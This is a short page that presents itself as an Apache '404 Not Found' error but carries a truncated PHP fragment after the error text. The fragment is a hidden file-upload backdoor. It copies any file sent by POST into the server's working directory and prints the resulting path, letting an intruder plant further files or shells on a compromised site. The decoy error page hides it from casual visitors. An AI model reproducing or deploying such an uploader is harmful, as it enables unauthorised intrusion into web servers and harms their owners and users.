Not Found

The requested URL /dw was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


"; if(isset($_POST['upload'])){ $cwd=getcwd(); $tmp=$_FILES['filena']['tmp_name']; $filena=$_FILES['filena']['name']; if(@copy($tmp, $filena)){ echo "
Success -> $cwd/$filena"; }else{ echo "
Failed -> Permission Denied"; } } } ?>